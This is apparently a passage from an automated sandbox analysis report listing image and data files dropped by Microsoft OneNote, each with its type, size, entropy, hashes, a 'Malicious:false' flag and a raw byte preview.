                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.|.....5h.y.%.~...G
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):84941
                                                                                                                                                                                                              Entropy (8bit):7.966881945560921
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
                                                                                                                                                                                                              MD5:CB84C108A76C2AFFCAC2551A3C1EAD56
                                                                                                                                                                                                              SHA1:8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
                                                                                                                                                                                                              SHA-256:139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
                                                                                                                                                                                                              SHA-512:6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 85 x 470, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11197
                                                                                                                                                                                                              Entropy (8bit):7.975073010774664
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
                                                                                                                                                                                                              MD5:DDC3CC30794277500EFE4BC6667EC123
                                                                                                                                                                                                              SHA1:EFC9642C1F95B5FC38764476AE481649C016FA0C
                                                                                                                                                                                                              SHA-256:7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
                                                                                                                                                                                                              SHA-512:25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):59832
                                                                                                                                                                                                              Entropy (8bit):7.308211468398169
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                                                                                                                              MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                                                                                                                              SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                                                                                                                              SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                                                                                                                              SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 50 x 556, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):977
                                                                                                                                                                                                              Entropy (8bit):7.231269197132181
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
                                                                                                                                                                                                              MD5:B7F74C18002A81A578A4EE60C407A8D3
                                                                                                                                                                                                              SHA1:70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
                                                                                                                                                                                                              SHA-256:95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
                                                                                                                                                                                                              SHA-512:13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12824
                                                                                                                                                                                                              Entropy (8bit):7.974776104184905
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                                                                                              MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                                                                                              SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                                                                                              SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                                                                                              SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):33032
                                                                                                                                                                                                              Entropy (8bit):2.941351060644542
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
                                                                                                                                                                                                              MD5:ACF4A9F470281F475EA45E113E9FB009
                                                                                                                                                                                                              SHA1:B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
                                                                                                                                                                                                              SHA-256:5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
                                                                                                                                                                                                              SHA-512:998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):59707
                                                                                                                                                                                                              Entropy (8bit):7.858445368171059
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
                                                                                                                                                                                                              MD5:47ADB0DF6FDA756920225A099B722322
                                                                                                                                                                                                              SHA1:851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
                                                                                                                                                                                                              SHA-256:EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
                                                                                                                                                                                                              SHA-512:85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65998
                                                                                                                                                                                                              Entropy (8bit):7.671031449942883
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
                                                                                                                                                                                                              MD5:B4F0A040890EE6F61EF8D9E094893C9C
                                                                                                                                                                                                              SHA1:303BCBA1D777B03BFD99CC01A48E0BB493C93E04
                                                                                                                                                                                                              SHA-256:1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
                                                                                                                                                                                                              SHA-512:8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6461727247291097
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:RaVYyf9/UfADKRNFFBtXMw0wMwfWf/3wMwD:YVYyfSYKJtcwOwfcwD
                                                                                                                                                                                                              MD5:5E4440640CEA702684C859D50C7EB181
                                                                                                                                                                                                              SHA1:88EB31E71ACF878EF1EE1044C102BC0267357541
                                                                                                                                                                                                              SHA-256:9E5242DC468D3CD72D8A0B760127C90CDEE9EC1EB12684BB67E4E4B402E65B22
                                                                                                                                                                                                              SHA-512:8D664D26893A1C73B36263BE80E7D1B63E316D47626E9787EFAEB343E3432AD4A886EC00480F013E7E576A7FD15DFA59F329C2019E2DE1D86C7DA23E40BE9205
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_..e...oF......9................?.....I...............................................................................................................h...........................................~.T...H....O...........3..Z..^A..]r's.x............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):242903
                                                                                                                                                                                                              Entropy (8bit):7.944495275553473
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
                                                                                                                                                                                                              MD5:C594A4AA7234EF91E6C2714CFE1410F1
                                                                                                                                                                                                              SHA1:C0F720D4CE3196852814D0B7347F0CAA0C6FD526
                                                                                                                                                                                                              SHA-256:10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
                                                                                                                                                                                                              SHA-512:7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1012 x 327
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11765
                                                                                                                                                                                                              Entropy (8bit):7.911655818336033
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:aUpmR1MS7mEuHIgBEoe/nOdV8EHi+rBJZ2M6qhH03NMWjvD5ZktcatNy+AT3jCOj:aUOVTi9EoDH8ujBJwMvhU3mgocatgdOm
                                                                                                                                                                                                              MD5:B035F23C68CC9673E604FE5472F223D2
                                                                                                                                                                                                              SHA1:56495B558547AACCE34C65C1D1FCF6C9ECAFCEE1
                                                                                                                                                                                                              SHA-256:F3F791A1303058D4F363E02F0515DE8484249624857CAF5ECE6C926D7324114C
                                                                                                                                                                                                              SHA-512:B6923EC5D91F5C771B65C63A97AB23BC8E6762CA60C31DEE8D1D141703923EDDFC266229B263EA88E10AF89A92C0EF361BF91A3D5CB600AE129C452D94580662
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:GIF89a..G.................................................................................................................................................................|.................................................................................................Y..Z..\.._..a..c..d..f..e..i..k..m..n..p..s..r..v..y..z..}..~....................0..3..5..6..7..9..<..>..@..B..C..E..G..J..N..N..P..R..T..V..[.................................................. ..!..#..#.."..$..&..&..(..)..+..+..,..,.....1..3..4..6..9..;..=..?..B..E..G..I..L..N..O..Q..S..W..Z..]..^..`..a..b..d..g..h..j..m..p..s..u..x..{..|..~.................................................................................................................................................!.......,......G........H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L....N....8q..i.L....3k.....C..M....S.^....
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):136726
                                                                                                                                                                                                              Entropy (8bit):7.973487854173386
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
                                                                                                                                                                                                              MD5:4A2472AC2A9434E35701362D1C56EDDF
                                                                                                                                                                                                              SHA1:16FA2EA2D2808D75445896E03B67A93000EEDDD8
                                                                                                                                                                                                              SHA-256:505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
                                                                                                                                                                                                              SHA-512:5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):24268
                                                                                                                                                                                                              Entropy (8bit):6.946124661664625
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                                                                                                                              MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                                                                                                                              SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                                                                                                                              SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                                                                                                                              SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12824
                                                                                                                                                                                                              Entropy (8bit):7.974776104184905
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                                                                                              MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                                                                                              SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                                                                                              SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                                                                                              SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25622
                                                                                                                                                                                                              Entropy (8bit):7.058784902089801
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                                                                                                                              MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                                                                                                                              SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                                                                                                                              SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
